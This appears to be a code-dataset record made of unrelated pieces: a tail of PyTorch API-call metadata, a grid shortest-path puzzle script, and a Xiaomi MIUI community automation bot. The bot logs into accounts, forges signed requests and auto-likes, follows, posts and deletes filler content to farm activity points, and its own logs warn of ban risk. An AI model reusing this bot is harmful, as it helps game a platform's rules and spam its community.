'import torch.nn as nn\n'), ((24121, 24149), 'torch.nn.Conv2d', 'nn.Conv2d', (['(512)', '(512)', '(3)', '(1)', '(1)'], {}), '(512, 512, 3, 1, 1)\n', (24130, 24149), True, 'import torch.nn as nn\n'), ((24172, 24200), 'torch.nn.Conv2d', 'nn.Conv2d', (['(512)', '(512)', '(3)', '(1)', '(1)'], {}), '(512, 512, 3, 1, 1)\n', (24181, 24200), True, 'import torch.nn as nn\n'), ((25086, 25105), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (25098, 25105), False, 'import torch\n'), ((528, 560), 'torch.nn.LeakyReLU', 'nn.LeakyReLU', (['neg_slope', 'inplace'], {}), '(neg_slope, inplace)\n', (540, 560), True, 'import torch.nn as nn\n'), ((997, 1032), 'torch.nn.InstanceNorm2d', 'nn.InstanceNorm2d', (['nc'], {'affine': '(False)'}), '(nc, affine=False)\n', (1014, 1032), True, 'import torch.nn as nn\n'), ((1457, 1485), 'torch.nn.ReplicationPad2d', 'nn.ReplicationPad2d', (['padding'], {}), '(padding)\n', (1476, 1485), True, 'import torch.nn as nn\n'), ((7598, 7619), 'torch.cat', 'torch.cat', (['(x, x1)', '(1)'], {}), '((x, x1), 1)\n', (7607, 7619), False, 'import torch\n'), ((7645, 7670), 'torch.cat', 'torch.cat', (['(x, x1, x2)', '(1)'], {}), '((x, x1, x2), 1)\n', (7654, 7670), False, 'import torch\n'), ((7696, 7725), 'torch.cat', 'torch.cat', (['(x, x1, x2, x3)', '(1)'], {}), '((x, x1, x2, x3), 1)\n', (7705, 7725), False, 'import torch\n'), ((7751, 7784), 'torch.cat', 'torch.cat', (['(x, x1, x2, x3, x4)', '(1)'], {}), '((x, x1, x2, x3, x4), 1)\n', (7760, 7784), False, 'import torch\n'), ((10235, 10255), 'math.log', 'math.log', (['upscale', '(2)'], {}), '(upscale, 2)\n', (10243, 10255), False, 'import math\n'), ((13775, 13802), 'torch.nn.Linear', 'nn.Linear', (['(512 * 4 * 4)', '(100)'], {}), '(512 * 4 * 4, 100)\n', (13784, 13802), True, 'import torch.nn as nn\n'), ((13804, 13827), 'torch.nn.LeakyReLU', 'nn.LeakyReLU', (['(0.2)', '(True)'], {}), '(0.2, True)\n', (13816, 13827), True, 'import torch.nn as nn\n'), ((13829, 13846), 'torch.nn.Linear', 'nn.Linear', (['(100)', '(1)'], {}), '(100, 1)\n', (13838, 13846), True, 'import torch.nn as nn\n'), ((14321, 14346), 'torch.nn.Conv2d', 'nn.Conv2d', (['(3)', '(64)', '(3)', '(1)', '(1)'], {}), '(3, 64, 3, 1, 1)\n', (14330, 14346), True, 'import torch.nn as nn\n'), ((14383, 14409), 'torch.nn.Conv2d', 'nn.Conv2d', (['(64)', '(64)', '(4)', '(2)', '(1)'], {}), '(64, 64, 4, 2, 1)\n', (14392, 14409), True, 'import torch.nn as nn\n'), ((14463, 14490), 'torch.nn.Conv2d', 'nn.Conv2d', (['(64)', '(128)', '(3)', '(1)', '(1)'], {}), '(64, 128, 3, 1, 1)\n', (14472, 14490), True, 'import torch.nn as nn\n'), ((14527, 14555), 'torch.nn.Conv2d', 'nn.Conv2d', (['(128)', '(128)', '(4)', '(2)', '(1)'], {}), '(128, 128, 4, 2, 1)\n', (14536, 14555), True, 'import torch.nn as nn\n'), ((14610, 14638), 'torch.nn.Conv2d', 'nn.Conv2d', (['(128)', '(256)', '(3)', '(1)', '(1)'], {}), '(128, 256, 3, 1, 1)\n', (14619, 14638), True, 'import torch.nn as nn\n'), ((14675, 14703), 'torch.nn.Conv2d', 'nn.Conv2d', (['(256)', '(256)', '(4)', '(2)', '(1)'], {}), '(256, 256, 4, 2, 1)\n', (14684, 14703), True, 'import torch.nn as nn\n'), ((14758, 14786), 'torch.nn.Conv2d', 'nn.Conv2d', (['(256)', '(512)', '(3)', '(1)', '(1)'], {}), '(256, 512, 3, 1, 1)\n', (14767, 14786), True, 'import torch.nn as nn\n'), ((14823, 14851), 'torch.nn.Conv2d', 'nn.Conv2d', (['(512)', '(512)', '(4)', '(2)', '(1)'], {}), '(512, 512, 4, 2, 1)\n', (14832, 14851), True, 'import torch.nn as nn\n'), ((14905, 14933), 'torch.nn.Conv2d', 'nn.Conv2d', (['(512)', '(512)', '(3)', '(1)', '(1)'], {}), '(512, 512, 3, 1, 1)\n', (14914, 14933), True, 'import torch.nn as nn\n'), ((14970, 14998), 'torch.nn.Conv2d', 'nn.Conv2d', (['(512)', '(512)', '(4)', '(2)', '(1)'], {}), '(512, 512, 4, 2, 1)\n', (14979, 14998), True, 'import torch.nn as nn\n'), ((15076, 15103), 'torch.nn.Linear', 'nn.Linear', (['(512 * 4 * 4)', '(100)'], {}), '(512 * 4 * 4, 100)\n', (15085, 15103), True, 'import torch.nn as nn\n'), ((15142, 15159), 'torch.nn.Linear', 'nn.Linear', (['(100)', '(1)'], {}), '(100, 1)\n', (15151, 15159), True, 'import torch.nn as nn\n'), ((17781, 17808), 'torch.nn.Linear', 'nn.Linear', (['(512 * 3 * 3)', '(100)'], {}), '(512 * 3 * 3, 100)\n', (17790, 17808), True, 'import torch.nn as nn\n'), ((17810, 17833), 'torch.nn.LeakyReLU', 'nn.LeakyReLU', (['(0.2)', '(True)'], {}), '(0.2, True)\n', (17822, 17833), True, 'import torch.nn as nn\n'), ((17835, 17852), 'torch.nn.Linear', 'nn.Linear', (['(100)', '(1)'], {}), '(100, 1)\n', (17844, 17852), True, 'import torch.nn as nn\n'), ((20443, 20470), 'torch.nn.Linear', 'nn.Linear', (['(512 * 3 * 3)', '(100)'], {}), '(512 * 3 * 3, 100)\n', (20452, 20470), True, 'import torch.nn as nn\n'), ((20472, 20495), 'torch.nn.LeakyReLU', 'nn.LeakyReLU', (['(0.2)', '(True)'], {}), '(0.2, True)\n', (20484, 20495), True, 'import torch.nn as nn\n'), ((20497, 20514), 'torch.nn.Linear', 'nn.Linear', (['(100)', '(1)'], {}), '(100, 1)\n', (20506, 20514), True, 'import torch.nn as nn\n'), ((21054, 21098), 'torchvision.models.vgg19_bn', 'torchvision.models.vgg19_bn', ([], {'pretrained': '(True)'}), '(pretrained=True)\n', (21081, 21098), False, 'import torchvision\n'), ((21133, 21174), 'torchvision.models.vgg19', 'torchvision.models.vgg19', ([], {'pretrained': '(True)'}), '(pretrained=True)\n', (21157, 21174), False, 'import torchvision\n'), ((25251, 25314), 'torch.load', 'torch.load', (['"""../experiments/pretrained_models/VGG16minc_53.pth"""'], {}), "('../experiments/pretrained_models/VGG16minc_53.pth')\n", (25261, 25314), False, 'import torch\n'), ((607, 655), 'torch.nn.PReLU', 'nn.PReLU', ([], {'num_parameters': 'n_prelu', 'init': 'neg_slope'}), '(num_parameters=n_prelu, init=neg_slope)\n', (615, 655), True, 'import torch.nn as nn\n'), ((21271, 21306), 'torch.Tensor', 'torch.Tensor', (['[0.485, 0.456, 0.406]'], {}), '([0.485, 0.456, 0.406])\n', (21283, 21306), False, 'import torch\n'), ((21420, 21455), 'torch.Tensor', 'torch.Tensor', (['[0.229, 0.224, 0.225]'], {}), '([0.229, 0.224, 0.225])\n', (21432, 21455), False, 'import torch\n'), ((22387, 22422), 'torch.Tensor', 'torch.Tensor', (['[0.485, 0.456, 0.406]'], {}), '([0.485, 0.456, 0.406])\n', (22399, 22422), False, 'import torch\n'), ((22536, 22571), 'torch.Tensor', 'torch.Tensor', (['[0.229, 0.224, 0.225]'], {}), '([0.229, 0.224, 0.225])\n', (22548, 22571), False, 'import torch\n')]
|
import os
import networkx as nx
def add_n_mat(mat, n):
new_mat = []
for l in mat:
new_mat.append(list(map(lambda x: ((x + n - 1) % 9) + 1, l)))
return new_mat
def add_n_list(l, n):
return list(map(lambda x: ((x + n - 1) % 9) + 1, l))
cwd = os.getcwd()
with open(f"{cwd}/input.txt") as f:
data = [[int(c) for c in l] for l in f.read().splitlines()]
orig_data = data[:]
for i in range(4):
data += add_n_mat(orig_data, i + 1)
aux = []
for l in data:
aux.append(l[:])
for i in range(4):
for j, l in enumerate(data):
l.extend(add_n_list(aux[j], i + 1))
g = nx.DiGraph()
for i, l in enumerate(data):
for j, n in enumerate(l):
if i < len(data) - 1:
g.add_edge((i + 1, j), (i, j), weight=n)
if i > 0:
g.add_edge((i - 1, j), (i, j), weight=n)
if j < len(l) - 1:
g.add_edge((i, j + 1), (i, j), weight=n)
if j > 0:
g.add_edge((i, j - 1), (i, j), weight=n)
print(nx.shortest_path_length(g, (0, 0), (len(data) - 1, len(data[0]) - 1), "weight"))
|
[
"os.getcwd",
"networkx.DiGraph"
] |
[((252, 263), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (261, 263), False, 'import os\n'), ((572, 584), 'networkx.DiGraph', 'nx.DiGraph', ([], {}), '()\n', (582, 584), True, 'import networkx as nx\n')]
|
# -- coding:UTF-8 --
import requests
import time
import json
import hashlib
from urllib import request
from http import cookiejar
from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config
class MIUITask:
def __init__(self, uid, password, user_agent, board_id, device_id):
self.uid = uid
self.password = password
self.user_agent = user_agent
self.board_id = board_id
self.device_id = device_id
# ็็ฉบ
self.cookie = ''
# ็็ฉบ
self.miui_vip_ph = ''
def thumb_up(self):
headers = {
'cookie': str(self.cookie)
}
try:
response = requests.get('https://api.vip.miui.com/api/community/post/thumbUp?postId=28270729',
headers=headers)
r_json = response.json()
if r_json['code'] == 401:
return w_log("็น่ตๅคฑ่ดฅ๏ผCookieๆ ๆ")
elif r_json['code'] != 200:
return w_log("็น่ตๅคฑ่ดฅ๏ผ" + str(r_json['message']))
w_log("็น่ตๆๅ")
except Exception as e:
w_log("็น่ตๅบ้")
w_log(e)
def cancel_thumb_up(self):
headers = {
'cookie': str(self.cookie)
}
try:
response = requests.get('https://api.vip.miui.com/api/community/post/cancelThumbUp?postId=28270729',
headers=headers)
r_json = response.json()
if r_json['code'] == 401:
return w_log("ๅๆถ็น่ตๅคฑ่ดฅ๏ผCookieๆ ๆ")
elif r_json['code'] != 200:
return w_log("ๅๆถ็น่ตๅคฑ่ดฅ๏ผ" + str(r_json['message']))
w_log("ๅๆถ็น่ตๆๅ")
except Exception as e:
w_log("ๅๆถ็น่ตๅบ้")
w_log(e)
def delete_post(self, tid):
headers = {
'cookie': str(self.cookie)
}
try:
response = requests.get('https://api.vip.miui.com/api/community/post/detail/delete?postId=' + str(tid),
headers=headers)
r_json = response.json()
if r_json['code'] == 401:
return w_log("ๅ ้คๅ
ๅฎนๅคฑ่ดฅ๏ผCookieๆ ๆ")
elif r_json['code'] != 200:
return w_log("ๅ ้คๅ
ๅฎนๅคฑ่ดฅ๏ผ" + str(r_json['message']))
w_log("ๅ ้คๅ
ๅฎนๆๅ๏ผ" + str(r_json['message']))
except Exception as e:
w_log("ๅ ้คๅ
ๅฎนๅบ้๏ผ่ฏทๆๅจๅ ้ค")
w_log(e)
# ๅๅธ็ญพๅ
def post_sign(self,data):
s_data = []
for d in data:
s_data.append(str(d) + '=' + str(data[d]))
s_str = '&'.join(s_data)
w_log('็ญพๅๅๆ๏ผ' + str(s_str))
s_str = hashlib.md5(str(s_str).encode(encoding='UTF-8')).hexdigest() + '067f0q5wds4'
s_sign = hashlib.md5(str(s_str).encode(encoding='UTF-8')).hexdigest()
w_log('็ญพๅ็ปๆ๏ผ' + str(s_sign))
return s_sign, data['timestamp']
# ๅๅธ
def new_announce(self, t_type):
headers = {
'cookie': str(self.cookie)
}
sign_data = {
'announce': '{"textContent":"ๅฐ็ฑณ็คพๅบ็ฝๅฑ","boards":[{"boardId":"' + self.board_id + '"}],"announceType":"' + str(t_type) + '","extraStatus":1,"extraA":"","extraB":null}',
'timestamp': int(round(time.time() * 1000))
}
sign = self.post_sign(sign_data)
data = {
'announce': sign_data['announce'],
'pageType': '1',
'miui_vip_ph': str(self.miui_vip_ph),
'sign': sign[0],
'timestamp': sign[1]
}
try:
response = requests.post('https://api.vip.miui.com/api/community/post/add/newAnnounce', headers=headers,
data=data)
r_json = response.json()
if r_json['code'] == 401:
return w_log("ๅ่กจๅ
ๅฎนๅคฑ่ดฅ๏ผCookieๆ ๆ")
elif r_json['code'] != 200:
return w_log("ๅ่กจๅ
ๅฎนๅคฑ่ดฅ๏ผ" + str(r_json['message']))
post_entity = json.loads(r_json['entity'])
w_log("ๅ่กจๅ
ๅฎนๆๅ๏ผๅธๅญID๏ผ" + str(post_entity['announceId']) + "๏ผๅฐๅจ3็งๅๅ ้ค")
self.add_comment_return_comment_info(str(post_entity['announceId']))
time.sleep(3)
# ๆง่ก5ๆฌกๅ ๅธๆฏไธบไบ้ฒๆญขๅ ๅธๅคฑ่ดฅ
for item in range(0, 5):
self.delete_post(post_entity['announceId'])
except Exception as e:
w_log("ๅ่กจๅ
ๅฎนๅบ้")
w_log(e)
# ๅๅธ
def add_comment_return_comment_info(self, tid):
headers = {
'cookie': str(self.cookie)
}
post_text = 'ๅฐ็ฑณ็คพๅบ็ฝๅฑ'
sign_data = {
'postId': str(tid),
'text': post_text,
'timestamp': int(round(time.time() * 1000))
}
sign = self.post_sign(sign_data)
data = {
'postId': str(tid),
'text': post_text,
'miui_vip_ph': str(self.miui_vip_ph),
'sign': sign[0],
'timestamp': sign[1]
}
try:
response = requests.post('https://api.vip.miui.com/mtop/planet/vip/content/addCommentReturnCommentInfo',
headers=headers, data=data)
r_json = response.json()
if r_json['code'] == 401:
return w_log("ๅๅคๅคฑ่ดฅ๏ผCookieๆ ๆ")
elif r_json['code'] != 200:
return w_log("ๅๅคๅคฑ่ดฅ๏ผ" + str(r_json['message']))
w_log("ๅๅคๆๅ")
except Exception as e:
w_log("ๅๅคๅบ้")
w_log(e)
def get_vip_cookie(self, url):
try:
r_cookie = cookiejar.CookieJar()
handler = request.HTTPCookieProcessor(r_cookie)
opener = request.build_opener(handler)
response = opener.open(url)
for item in r_cookie:
self.cookie += item.name + '=' + item.value + ';'
if self.cookie == '':
return False
ck_list = self.cookie.replace(" ", "").split(';')
for ph in ck_list:
if "miui_vip_ph=" in ph:
self.miui_vip_ph = ph.replace("miui_vip_ph=", "")
break
return True
except Exception as e:
w_log(e)
return False
# ๆไบคๆปกๆๅบฆ้ฎๅท
def submit_survey(self, sid):
headers = {
'cookie': str(self.cookie)
}
data = {
'survey': '{"surveyId":' + str(sid) + ',"answer":{"1":"A"}}',
'businessId': '2',
'miui_vip_ph': str(self.miui_vip_ph)
}
try:
response = requests.post('https://api.vip.miui.com/api/miui/dev/survey/submit', headers=headers, data=data)
r_json = response.json()
if r_json['code'] == 401:
return w_log("ๆปกๆๅบฆๆ็ฅจๅคฑ่ดฅ๏ผCookieๆ ๆ")
elif r_json['code'] != 200:
return w_log("ๆปกๆๅบฆๆ็ฅจๅคฑ่ดฅ๏ผ" + str(r_json['message']))
w_log("ๆปกๆๅบฆๆ็ฅจๆๅ")
except Exception as e:
w_log("ๆปกๆๅบฆๆ็ฅจๅบ้")
w_log(e)
# ่ทๅๆปกๆๅบฆๆ็ฅจ้ฎๅทID
def get_survey_id(self):
headers = {
'cookie': str(self.cookie)
}
try:
response = requests.get('https://api.vip.miui.com/api/miui/dev/survey?businessId=2', headers=headers)
r_json = response.json()
if r_json['code'] == 401:
return w_log("่ทๅ้ฎๅทIDๅคฑ่ดฅ๏ผCookieๆ ๆ")
elif r_json['code'] != 200:
return w_log("่ทๅ้ฎๅทIDๅคฑ่ดฅ๏ผ" + str(r_json['message']))
elif r_json['entity']['surveyInfo']['surveyId'] is None:
w_log("่ทๅ้ฎๅทIDๅคฑ่ดฅ๏ผ้ฎๅทIDไธบ็ฉบ")
survey_id = r_json['entity']['surveyInfo']['surveyId']
w_log("่ทๅ้ฎๅทIDๆๅ๏ผ" + str(survey_id))
self.submit_survey(survey_id)
except Exception as e:
w_log("่ทๅ้ฎๅทIDๅบ้๏ผๆปกๆๅบฆๆ็ฅจๅคฑ่ดฅ")
w_log(e)
# ๅๅ
ณ็จๆท
def unfollow_user(self):
headers = {
'cookie': str(self.cookie)
}
try:
response = requests.get('https://api.vip.miui.com/api/community/user/relation/unfollow?followeeId=210836962',
headers=headers)
r_json = response.json()
if r_json['code'] == 401:
return w_log("ๅๅ
ณ็จๆทๅคฑ่ดฅ๏ผCookieๆ ๆ")
elif r_json['code'] != 200:
return w_log("ๅๅ
ณ็จๆทๅคฑ่ดฅ๏ผ" + str(r_json['message']))
w_log("ๅๅ
ณ็จๆทๆๅ")
except Exception as e:
w_log("ๅๅ
ณ็จๆทๅบ้")
w_log(e)
# ๅ
ณๆณจ็จๆท
def follow_user(self):
headers = {
'cookie': str(self.cookie)
}
try:
response = requests.get('https://api.vip.miui.com/api/community/user/relation/follow?followeeId=210836962',
headers=headers)
rJson = response.json()
if rJson['code'] == 401:
return w_log("ๅ
ณๆณจ็จๆทๅคฑ่ดฅ๏ผCookieๆ ๆ")
elif rJson['code'] != 200:
return w_log("ๅ
ณๆณจ็จๆทๅคฑ่ดฅ๏ผ" + str(rJson['message']))
w_log("ๅ
ณๆณจ็จๆทๆๅ")
except Exception as e:
w_log("ๅ
ณๆณจ็จๆทๅบ้")
w_log(e)
# ้ๅบๅๅญ
def unfollow_board(self):
headers = {
'cookie': str(self.cookie)
}
try:
response = requests.get('https://api.vip.miui.com/api/community/board/unfollow?boardId=5462662',
headers=headers)
r_json = response.json()
if r_json['code'] == 401:
return w_log("้ๅบๅๅญๅคฑ่ดฅ๏ผCookieๆ ๆ")
elif r_json['code'] != 200:
return w_log("้ๅบๅๅญๅคฑ่ดฅ๏ผ" + str(r_json['message']))
w_log("้ๅบๅๅญๆๅ")
except Exception as e:
w_log("้ๅบๅๅญๅบ้")
w_log(e)
# ๅ ๅ
ฅๅๅญ
def follow_board(self):
headers = {
'cookie': str(self.cookie)
}
try:
response = requests.get('https://api.vip.miui.com/api/community/board/follow?boardId=5462662', headers=headers)
r_json = response.json()
if r_json['code'] == 401:
return w_log("ๅ ๅ
ฅๅๅญๅคฑ่ดฅ๏ผCookieๆ ๆ")
elif r_json['code'] != 200:
return w_log("ๅ ๅ
ฅๅๅญๅคฑ่ดฅ๏ผ" + str(r_json['message']))
w_log("ๅ ๅ
ฅๅๅญๆๅ")
except Exception as e:
w_log("ๅ ๅ
ฅๅๅญๅบ้")
# ๆดป่ทๅบฆไปปๅก้ขๅ
def start_task(self, task_id):
headers = {
'cookie': str(self.cookie)
}
data = {
'taskId': str(task_id),
'miui_vip_ph': str(self.miui_vip_ph)
}
try:
response = requests.post('https://api.vip.miui.com/api/community/user/task/start?version=dev.210805',
headers=headers, data=data)
r_json = response.json()
if r_json['code'] == 401:
return w_log("ๅผๅงๆดป่ทๅไปปๅกๅคฑ่ดฅ๏ผCookieๆ ๆ")
elif r_json['code'] != 200:
return w_log("ๅผๅงๆดป่ทๅไปปๅกๅคฑ่ดฅ๏ผ" + str(r_json['message']))
w_log("ๅผๅงๆดป่ทๅไปปๅกๆๅ")
except Exception as e:
w_log("ๅผๅงๆดป่ทๅไปปๅกๅบ้")
w_log(e)
# ๆดป่ทๅบฆไปปๅกๅฎๆ
def acquire_task(self, task_id):
headers = {
'cookie': str(self.cookie)
}
data = {
'taskId': str(task_id),
'miui_vip_ph': str(self.miui_vip_ph)
}
try:
response = requests.post('https://api.vip.miui.com/api/community/user/task/acquire?version=dev.210805',
headers=headers, data=data)
r_json = response.json()
if r_json['code'] == 401:
return w_log("้ขๅๆดป่ทๅๅคฑ่ดฅ๏ผCookieๆ ๆ")
elif r_json['code'] != 200:
return w_log("้ขๅๆดป่ทๅๅคฑ่ดฅ๏ผ" + str(r_json['message']))
w_log("้ขๅๆดป่ทๅๆๅ")
except Exception as e:
w_log("้ขๅๆดป่ทๅๅบ้")
w_log(e)
# ็คพๅบๆ่ๅ็ญพๅฐ
def vip_check_in(self):
headers = {
'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8',
'cookie': str(self.cookie)
}
data = {
'miui_vip_ph': str(self.miui_vip_ph)
}
try:
response = requests.post('https://api.vip.miui.com/api/carrot/pull', headers=headers,
data=data)
r_json = response.json()
if r_json['code'] == 401:
return w_log("็คพๅบๆ่ๅ็ญพๅฐๅคฑ่ดฅ๏ผCookieๆ ๆ")
elif r_json['code'] != 200:
return w_log("็คพๅบๆ่ๅ็ญพๅฐๅคฑ่ดฅ๏ผ" + str(r_json['message']))
w_log("็คพๅบๆ่ๅ็ญพๅฐๆๅ")
except Exception as e:
w_log("็คพๅบๆ่ๅ็ญพๅฐๅบ้")
w_log(e)
def mi_login(self):
proxies = {
'https': None,
'http': None
}
headers = {
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Referer': 'https://account.xiaomi.com/fe/service/login/password?sid=miui_vip&qs=%253Fcallback%253Dhttp'
'%25253A%25252F%25252Fapi.vip.miui.com%25252Fsts%25253Fsign%25253D4II4ABwZkiJzkd2YSkyEZukI4Ak'
'%2525253D%252526followup%25253Dhttps%2525253A%2525252F%2525252Fapi.vip.miui.com%2525252Fpage'
'%2525252Flogin%2525253FdestUrl%2525253Dhttps%252525253A%252525252F%252525252Fweb.vip.miui.com'
'%252525252Fpage%252525252Finfo%252525252Fmio%252525252Fmio%252525252FinternalTest%252525253Fref'
'%252525253Dhomepage%2526sid%253Dmiui_vip&callback=http%3A%2F%2Fapi.vip.miui.com%2Fsts%3Fsign'
'%3D4II4ABwZkiJzkd2YSkyEZukI4Ak%253D%26followup%3Dhttps%253A%252F%252Fapi.vip.miui.com%252Fpage'
'%252Flogin%253FdestUrl%253Dhttps%25253A%25252F%25252Fweb.vip.miui.com%25252Fpage%25252Finfo'
'%25252Fmio%25252Fmio%25252FinternalTest%25253Fref%25253Dhomepage&_sign=L%2BdSQY6sjSQ%2FCRjJs4p'
'%2BU1vNYLY%3D&serviceParam=%7B%22checkSafePhone%22%3Afalse%2C%22checkSafeAddress%22%3Afalse%2C'
'%22lsrp_score%22%3A0.0%7D&showActiveX=false&theme=&needTheme=false&bizDeviceType=',
'User-Agent': str(self.user_agent),
'Origin': 'https://account.xiaomi.com',
'X-Requested-With': 'XMLHttpRequest',
'Cookie': 'deviceId=' + str(self.device_id) + '; pass_ua=web; uLocale=zh_CN'
}
data = {
'bizDeviceType': '',
'needTheme': 'false',
'theme': '',
'showActiveX': 'false',
'serviceParam': '{"checkSafePhone":false,"checkSafeAddress":false,"lsrp_score":0.0}',
'callback': 'http://api.vip.miui.com/sts?sign=4II4ABwZkiJzkd2YSkyEZukI4Ak%3D&followup=https%3A%2F%2Fapi.vip'
'.miui.com%2Fpage%2Flogin%3FdestUrl%3Dhttps%253A%252F%252Fweb.vip.miui.com%252Fpage%252Finfo'
'%252Fmio%252Fmio%252FinternalTest%253Fref%253Dhomepage',
'qs': '%3Fcallback%3Dhttp%253A%252F%252Fapi.vip.miui.com%252Fsts%253Fsign%253D4II4ABwZkiJzkd2YSkyEZukI4Ak'
'%25253D%2526followup%253Dhttps%25253A%25252F%25252Fapi.vip.miui.com%25252Fpage%25252Flogin'
'%25253FdestUrl%25253Dhttps%2525253A%2525252F%2525252Fweb.vip.miui.com%2525252Fpage%2525252Finfo'
'%2525252Fmio%2525252Fmio%2525252FinternalTest%2525253Fref%2525253Dhomepage%26sid%3Dmiui_vip',
'sid': 'miui_vip',
'_sign': 'L+dSQY6sjSQ/CRjJs4p+U1vNYLY=',
'user': str(self.uid),
'cc': '+86',
'hash': str(self.password),
'_json': 'true'
}
try:
response = requests.post('https://account.xiaomi.com/pass/serviceLoginAuth2', headers=headers, data=data,
proxies=proxies)
response_data = response.text.lstrip('&').lstrip('START').lstrip('&')
r_json = json.loads(response_data)
if r_json['code'] == 70016:
w_log('ๅฐ็ฑณ่ดฆๅท็ปๅฝๅคฑ่ดฅ๏ผ็จๆทๅๆๅฏ็ ไธๆญฃ็กฎ')
return False
if r_json['code'] != 0:
w_log('ๅฐ็ฑณ่ดฆๅท็ปๅฝๅคฑ่ดฅ๏ผ' + r_json['desc'])
return False
if r_json['pwd'] != 1:
w_log('ๅฝๅ่ดฆๅท้่ฆ็ญไฟก้ช่ฏ็ ๏ผ่ฏทๅฐ่ฏไฟฎๆนUAๆ่ฎพๅคID')
return False
if not self.get_vip_cookie(r_json['location']):
w_log('ๅฐ็ฑณ่ดฆๅท็ปๅฝๆๅ๏ผ็คพๅบ่ทๅ Cookie ๅคฑ่ดฅ')
return False
w_log('่ดฆๅท็ปๅฝๅฎๆ')
return True
except Exception as e:
w_log("็ปๅฝๅฐ็ฑณ่ดฆๅทๅบ้")
w_log(e)
return False
def get_score(self) -> int:
"""
่ฟไธชๆนๆณๅธฆ่ฟๅๅผ็ๅๅ ๆฏ๏ผๅฏไปฅ่ฐ็จ่ฟไธชๆนๆณ่ทๅ่ฟๅๅผ๏ผๅฏๆ นๆฎ่ฟไธชๆนๆณๅฎๅถ่ชๅทฑ็โๆถๆฏๆ็คบๅ่ฝโใ
ๅฆ๏ผQmsgๅ้ๅฐQQ ๆ่
ๅ้้ฎไปถๆ้
:return: ๅฝๅ็ๅ
ๆตๅๅผ
"""
headers = {
'cookie': str(self.cookie)
}
try:
response = requests.get('https://api.vip.miui.com/mtop/planet/vip/betaTest/score', headers=headers)
r_json = response.json()
your_score = r_json['entity']
w_log('ๆๅ่ทๅๅ
ๆตๅ,ๅฝๅๅ
ๆตๅ๏ผ' + str(your_score))
return your_score
except Exception as e:
w_log('ๅ
ๆตๅ่ทๅๅคฑ่ดฅ')
process_exception(e)
def process_exception(e: Exception):
"""
ๅ
จๅฑๅผๅธธๅค็
:param e: ๅผๅธธๅฎไพ
:return: No return
"""
if e.__str__() == 'check_hostname requires server_hostname':
w_log('็ณป็ป่ฎพ็ฝฎไบไปฃ็๏ผๅบ็ฐๅผๅธธ')
def start(miui_task: MIUITask, check_in: bool, enhanced_mode: bool):
if miui_task.mi_login():
w_log("ๆฌ่ๆฌๆฏๆ็คพๅบ็ญพๅฐ๏ผๅ ่ฏฅๅ่ฝๅญๅจ้ฃ้ฉ้ป่ฎค็ฆ็จ")
w_log("ๅฆๆจๆฟๆๆฟๆ
ไธๅๅฏ่ฝ็ๅๆ๏ผๅฏ็ผ่พ้
็ฝฎๆไปถๆๅจๆๅผ่ฏฅๅ่ฝ")
if check_in:
w_log("้ฃ้ฉๅ่ฝๆ็คบ๏ผๆญฃๅจ่ฟ่ก็คพๅบ็ญพๅฐ")
miui_task.vip_check_in()
w_log("ๆญฃๅจๅฎๆๆปกๆๅบฆ่ฐๆฅไปปๅก")
miui_task.get_survey_id()
w_log("ๆญฃๅจๅฎๆ็น่ตไปปๅก")
miui_task.start_task("10106256")
miui_task.thumb_up()
time.sleep(0.2)
miui_task.cancel_thumb_up()
time.sleep(0.2)
miui_task.acquire_task("10106256")
w_log("ๆญฃๅจๅฎๆๆดป่ทๅ_ๅ
ณๆณจไปปๅก")
miui_task.start_task("10106261")
miui_task.unfollow_user()
miui_task.follow_user()
w_log("5็งๅ้ขๅๆดป่ทๅ_ๅ
ณๆณจไปปๅก")
time.sleep(5)
miui_task.acquire_task("10106261")
w_log("ๆญฃๅจๅฎๆๆดป่ทๅ_ๅ ๅไปปๅก")
miui_task.start_task("10106262")
miui_task.unfollow_board()
miui_task.follow_board()
w_log("5็งๅ้ขๅๆดป่ทๅ_ๅ ๅไปปๅก")
time.sleep(5)
miui_task.acquire_task("10106262")
if enhanced_mode:
w_log("้ฃ้ฉๅ่ฝๆ็คบ๏ผๅขๅผบๆจกๅผๅทฒๅฏ็จ")
w_log("ๅขๅผบๆจกๅผๅทฒๅฏ็จ๏ผๅญๅจๅฐๅท้ฃ้ฉ")
miui_task.start_task("10106263")
w_log("ๆญฃๅจๅฎๆBUGๅ้ฆไปปๅก")
miui_task.new_announce("7")
w_log("3็งๅๆง่กๆๅปบ่ฎฎไปปๅก")
miui_task.acquire_task("10106263")
time.sleep(3)
w_log("ๆญฃๅจๅฎๆๆๅปบ่ฎฎไปปๅก")
miui_task.new_announce("6")
w_log("ๆญฃๅจๅฎๆๆดป่ทๅ_ๅๅธไปปๅก")
miui_task.start_task("10106265")
miui_task.new_announce("3")
w_log("5็งๅ้ขๅๆดป่ทๅ_ๅๅธไปปๅก")
time.sleep(5)
miui_task.acquire_task("10106265")
miui_task.get_score()
def main():
w_log("MIUI-AUTO-TASK v1.4")
w_log('---------- ็ณป็ปไฟกๆฏ -------------')
system_info()
w_log('---------- ้กน็ฎไฟกๆฏ -------------')
w_log("้กน็ฎๅฐๅ๏ผhttps://github.com/0-8-4/miui-auto-tasks")
w_log("ๆฌข่ฟ star๏ผๆ่ฐขๆฑ้ฒ็ ็ฉถๆไธญ็ๅคงไฝฌ")
w_log('---------- ้
็ฝฎๆฃๆต -------------')
config = get_config()
if not check_config(config):
w_log('้
็ฝฎๆไปถๆฒกๆๆญฃ็กฎ้
็ฝฎ')
exit(1)
else:
config = format_config(config)
for i in config.get('accounts'):
w_log('---------- EXECUTING -------------')
start(
MIUITask(i.get('uid'), i.get('password'), i.get('user-agent'), i.get('board-id'), device_id=i.get('device-id')),
i.get('check-in'),
i.get('enhance-mode')
)
s_log(config.get('logging'))
def main_handler(event, context):
main()
if __name__ == "__main__":
main()
|
[
"utils.utils.check_config",
"json.loads",
"http.cookiejar.CookieJar",
"urllib.request.HTTPCookieProcessor",
"utils.utils.system_info",
"time.sleep",
"urllib.request.build_opener",
"utils.utils.format_config",
"time.time",
"requests.get",
"requests.post",
"utils.utils.get_config",
"utils.utils.w_log"
] |
